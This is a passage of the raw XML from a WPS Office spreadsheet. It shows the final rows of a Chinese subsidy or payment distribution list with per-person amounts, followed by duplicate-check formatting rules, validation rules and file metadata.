      <c r="K2737" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2738" ht="23" customHeight="1" spans="1:11">
      <c r="A2738" s="13" t="s">
        <v>7210</v>
      </c>
      <c r="B2738" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2738" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2738" s="14" t="s">
        <v>7211</v>
      </c>
      <c r="E2738" s="14" t="s">
        <v>7071</v>
      </c>
      <c r="F2738" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2738" s="14">
        <v>1</v>
      </c>
      <c r="H2738" s="14">
        <v>340</v>
      </c>
      <c r="I2738" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2738" s="24">
        <v>45597</v>
      </c>
      <c r="K2738" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2739" ht="23" customHeight="1" spans="1:11">
      <c r="A2739" s="13" t="s">
        <v>7212</v>
      </c>
      <c r="B2739" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2739" s="14" t="s">
        <v>7189</v>
      </c>
      <c r="D2739" s="14" t="s">
        <v>7213</v>
      </c>
      <c r="E2739" s="14" t="s">
        <v>7214</v>
      </c>
      <c r="F2739" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2739" s="14">
        <v>1</v>
      </c>
      <c r="H2739" s="14">
        <v>340</v>
      </c>
      <c r="I2739" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2739" s="24">
        <v>45627</v>
      </c>
      <c r="K2739" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2740" ht="23" customHeight="1" spans="1:11">
      <c r="A2740" s="13" t="s">
        <v>7215</v>
      </c>
      <c r="B2740" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2740" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2740" s="14" t="s">
        <v>7216</v>
      </c>
      <c r="E2740" s="14" t="s">
        <v>5170</v>
      </c>
      <c r="F2740" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2740" s="14">
        <v>1</v>
      </c>
      <c r="H2740" s="14">
        <v>340</v>
      </c>
      <c r="I2740" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2740" s="24">
        <v>45658</v>
      </c>
      <c r="K2740" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2741" ht="23" customHeight="1" spans="1:11">
      <c r="A2741" s="13" t="s">
        <v>7217</v>
      </c>
      <c r="B2741" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2741" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2741" s="14" t="s">
        <v>7218</v>
      </c>
      <c r="E2741" s="14" t="s">
        <v>5170</v>
      </c>
      <c r="F2741" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2741" s="14">
        <v>1</v>
      </c>
      <c r="H2741" s="14">
        <v>340</v>
      </c>
      <c r="I2741" s="14">
        <f t="shared" si="130"/>
        <v>340</v>
      </c>
      <c r="J2741" s="24">
        <v>45658</v>
      </c>
      <c r="K2741" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2742" ht="23" customHeight="1" spans="1:11">
      <c r="A2742" s="13" t="s">
        <v>7219</v>
      </c>
      <c r="B2742" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2742" s="14" t="s">
        <v>7189</v>
      </c>
      <c r="D2742" s="14" t="s">
        <v>7220</v>
      </c>
      <c r="E2742" s="14" t="s">
        <v>7221</v>
      </c>
      <c r="F2742" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2742" s="14">
        <v>2</v>
      </c>
      <c r="H2742" s="14">
        <v>300</v>
      </c>
      <c r="I2742" s="14">
        <f t="shared" si="130"/>
        <v>600</v>
      </c>
      <c r="J2742" s="24">
        <v>45658</v>
      </c>
      <c r="K2742" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2743" ht="23" customHeight="1" spans="1:11">
      <c r="A2743" s="13" t="s">
        <v>7222</v>
      </c>
      <c r="B2743" s="14" t="str">
        <f>B2742</f>
        <v>军工办</v>
      </c>
      <c r="C2743" s="14" t="str">
        <f>C2742</f>
        <v>向东厂社区</v>
      </c>
      <c r="D2743" s="18" t="s">
        <v>7223</v>
      </c>
      <c r="E2743" s="19" t="s">
        <v>7224</v>
      </c>
      <c r="F2743" s="14" t="str">
        <f>F2742</f>
        <v>4113210699</v>
      </c>
      <c r="G2743" s="14"/>
      <c r="H2743" s="14"/>
      <c r="I2743" s="14"/>
      <c r="J2743" s="14"/>
      <c r="K2743" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2744" ht="23" customHeight="1" spans="1:11">
      <c r="A2744" s="13" t="s">
        <v>7225</v>
      </c>
      <c r="B2744" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2744" s="14" t="s">
        <v>7189</v>
      </c>
      <c r="D2744" s="14" t="s">
        <v>7226</v>
      </c>
      <c r="E2744" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F2744" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2744" s="14">
        <v>1</v>
      </c>
      <c r="H2744" s="14">
        <v>340</v>
      </c>
      <c r="I2744" s="14">
        <f>H2744*G2744</f>
        <v>340</v>
      </c>
      <c r="J2744" s="14" t="s">
        <v>4845</v>
      </c>
      <c r="K2744" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2745" s="7" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2745" s="13" t="s">
        <v>7227</v>
      </c>
      <c r="B2745" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2745" s="80" t="s">
        <v>7034</v>
      </c>
      <c r="D2745" s="84" t="s">
        <v>7228</v>
      </c>
      <c r="E2745" s="87" t="s">
        <v>4922</v>
      </c>
      <c r="F2745" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2745" s="14">
        <v>1</v>
      </c>
      <c r="H2745" s="14">
        <v>340</v>
      </c>
      <c r="I2745" s="14">
        <f>H2745*G2745</f>
        <v>340</v>
      </c>
      <c r="J2745" s="88" t="s">
        <v>3172</v>
      </c>
      <c r="K2745" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2746" ht="23" customHeight="1" spans="1:11">
      <c r="A2746" s="13" t="s">
        <v>7229</v>
      </c>
      <c r="B2746" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2746" s="14" t="s">
        <v>7127</v>
      </c>
      <c r="D2746" s="14" t="s">
        <v>7230</v>
      </c>
      <c r="E2746" s="14" t="s">
        <v>3320</v>
      </c>
      <c r="F2746" s="14">
        <v>4113210399</v>
      </c>
      <c r="G2746" s="14">
        <v>1</v>
      </c>
      <c r="H2746" s="14">
        <v>340</v>
      </c>
      <c r="I2746" s="14">
        <f>H2746*G2746</f>
        <v>340</v>
      </c>
      <c r="J2746" s="14">
        <v>45108</v>
      </c>
      <c r="K2746" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2747" ht="25" customHeight="1" spans="7:9">
      <c r="G2747" s="10">
        <f>SUM(G3:G2746)</f>
        <v>2744</v>
      </c>
      <c r="I2747" s="89">
        <f>SUM(I3:I2746)</f>
        <v>887965</v>
      </c>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A2:XEV2747" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <mergeCells count="1">
    <mergeCell ref="A1:K1"/>
  </mergeCells>
  <conditionalFormatting sqref="E169">
    <cfRule type="expression" dxfId="0" priority="202">
      <formula>AND(COUNTIF(#REF!,E169)+COUNTIF(#REF!,E169)&gt;1,NOT(ISBLANK(E169)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E713">
    <cfRule type="expression" dxfId="0" priority="7">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$713&amp;"x")=(E713&amp;"x")),0))&gt;1,NOT(ISBLANK(E713)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1154">
    <cfRule type="duplicateValues" dxfId="1" priority="36"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1155">
    <cfRule type="duplicateValues" dxfId="1" priority="35"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1157">
    <cfRule type="expression" dxfId="0" priority="30">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1157&amp;"x")=(E1157&amp;"x")),0))&gt;1,NOT(ISBLANK(E1157)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1157">
    <cfRule type="duplicateValues" dxfId="1" priority="26"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1158">
    <cfRule type="duplicateValues" dxfId="1" priority="25"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1166">
    <cfRule type="expression" dxfId="0" priority="10">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($D$1166&amp;"x")=(D1166&amp;"x")),0))&gt;1,NOT(ISBLANK(D1166)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1166">
    <cfRule type="expression" dxfId="0" priority="22">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1166&amp;"x")=(E1166&amp;"x")),0))&gt;1,NOT(ISBLANK(E1166)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1166">
    <cfRule type="duplicateValues" dxfId="1" priority="20"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1167">
    <cfRule type="expression" dxfId="0" priority="19">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1167&amp;"x")=(E1167&amp;"x")),0))&gt;1,NOT(ISBLANK(E1167)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1192">
    <cfRule type="expression" dxfId="0" priority="4">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1192&amp;"x")=(E1192&amp;"x")),0))&gt;1,NOT(ISBLANK(E1192)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1259">
    <cfRule type="duplicateValues" dxfId="1" priority="5"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1337">
    <cfRule type="duplicateValues" dxfId="1" priority="84"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1549">
    <cfRule type="duplicateValues" dxfId="1" priority="125" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1623">
    <cfRule type="duplicateValues" dxfId="1" priority="174"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1634">
    <cfRule type="duplicateValues" dxfId="1" priority="173"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1641">
    <cfRule type="duplicateValues" dxfId="1" priority="172"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1655">
    <cfRule type="duplicateValues" dxfId="1" priority="126" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1661">
    <cfRule type="duplicateValues" dxfId="1" priority="171"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1681">
    <cfRule type="duplicateValues" dxfId="1" priority="170"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1689">
    <cfRule type="duplicateValues" dxfId="1" priority="169"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1785">
    <cfRule type="duplicateValues" dxfId="1" priority="55" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1789">
    <cfRule type="duplicateValues" dxfId="1" priority="88" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1790">
    <cfRule type="duplicateValues" dxfId="1" priority="87"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="D1795">
    <cfRule type="duplicateValues" dxfId="1" priority="54" stopIfTrue="1"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2209">
    <cfRule type="duplicateValues" dxfId="1" priority="188"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2354">
    <cfRule type="duplicateValues" dxfId="1" priority="207"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2359">
    <cfRule type="duplicateValues" dxfId="1" priority="198"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2456">
    <cfRule type="duplicateValues" dxfId="1" priority="197"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2509">
    <cfRule type="duplicateValues" dxfId="1" priority="143"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2618">
    <cfRule type="expression" dxfId="0" priority="13">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$2618&amp;"x")=(E2618&amp;"x")),0))&gt;1,NOT(ISBLANK(E2618)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2626">
    <cfRule type="expression" dxfId="0" priority="144">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$2626&amp;"x")=(E2626&amp;"x")),0))&gt;1,NOT(ISBLANK(E2626)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D2638">
    <cfRule type="duplicateValues" dxfId="1" priority="91"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2638">
    <cfRule type="expression" dxfId="0" priority="90">
      <formula>AND(COUNTIF(#REF!,E2638)+COUNTIF(#REF!,E2638)&gt;1,NOT(ISBLANK(E2638)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2664">
    <cfRule type="duplicateValues" dxfId="1" priority="31"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1137:E1138">
    <cfRule type="expression" dxfId="0" priority="8">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1137:$E$1138&amp;"x")=(E1137&amp;"x")),0))&gt;1,NOT(ISBLANK(E1137)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1183:F1184">
    <cfRule type="duplicateValues" dxfId="1" priority="6"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1195:F1196">
    <cfRule type="expression" dxfId="0" priority="3">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($F$1195:$F$1196&amp;"x")=(F1195&amp;"x")),0))&gt;1,NOT(ISBLANK(F1195)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1158:E1161 E1163:E1165 E1168 E1156">
    <cfRule type="expression" dxfId="0" priority="33">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1158:$E$1161&amp;"x")=(E1156&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$1163:$E$1165&amp;"x")=(E1156&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$1168&amp;"x")=(E1156&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$1156&amp;"x")=(E1156&amp;"x")),0))&gt;1,NOT(ISBLANK(E1156)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1165 F1167">
    <cfRule type="duplicateValues" dxfId="1" priority="24"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1182:E1183 E1185:E1190 E1173:E1174 E1169:E1171">
    <cfRule type="expression" dxfId="0" priority="16">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($E$1182:$E$1183&amp;"x")=(E1169&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$1185:$E$1190&amp;"x")=(E1169&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$1173:$E$1174&amp;"x")=(E1169&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($E$1169:$E$1171&amp;"x")=(E1169&amp;"x")),0))&gt;1,NOT(ISBLANK(E1169)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C1171:C1172 C1174 C1182:C1190">
    <cfRule type="expression" dxfId="0" priority="15">
      <formula>AND(SUMPRODUCT(IFERROR(1*(($C$1171:$C$1172&amp;"x")=(C1171&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($C$1174&amp;"x")=(C1171&amp;"x")),0))+SUMPRODUCT(IFERROR(1*(($C$1182:$C$1190&amp;"x")=(C1171&amp;"x")),0))&gt;1,NOT(ISBLANK(C1171)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="4">
    <dataValidation allowBlank="1" sqref="E778 E844 E923 E950 E994 E1156 E1193 E1198 D1367:E1367 E1959 E1158:E1161 E1163:E1165 E1168:E1171 E1173:E1174 E1182:E1183 E1185:E1190"/>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E803 E1040 E1042 E1081 E1094 E1100 E1106 E1123 E1135 E1139 E1339 E1052:E1053 E1326:E1327 E1343:E1345">
      <formula1>COUNTIF(#REF!,E803)&lt;2</formula1>
    </dataValidation>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E2352 E2355" errorStyle="warning">
      <formula1>COUNTIF($H:$H,E2352)&lt;2</formula1>
    </dataValidation>
    <dataValidation type="custom" allowBlank="1" showErrorMessage="1" errorTitle="拒绝重复输入" error="当前输入的内容，与本区域的其他单元格内容重复。" sqref="E2624 E2729 E2731 E1320:E1321 E1328:E1329 E2658:E2665" errorStyle="warning">
      <formula1>COUNTIF(#REF!,E1320)&lt;2</formula1>
    </dataValidation>
  </dataValidations>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.747916666666667" right="0.747916666666667" top="0.984027777777778" bottom="0.984027777777778" header="0.510416666666667" footer="0.510416666666667"/>
  <pageSetup paperSize="9" scale="75" firstPageNumber="4294963191" orientation="landscape" useFirstPageNumber="1" horizontalDpi="180" verticalDpi="180"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Application>WPS Office 个人版</Application>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>工作表</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="2" baseType="lpstr">
      <vt:lpstr>Recovered_Sheet1</vt:lpstr>
      <vt:lpstr>发放明细表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dc:creator>
  <cp:lastModifiedBy>WPS_530817245</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-11-24T00:28:00Z</dcterms:created>
  <cp:lastPrinted>2019-01-30T08:27:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-25T01:11:47Z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KSOReadingLayout">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>83CDCF8DE34140C28BFEF10AD34543FE</vt:lpwstr>
  </property>
</Properties>
</file>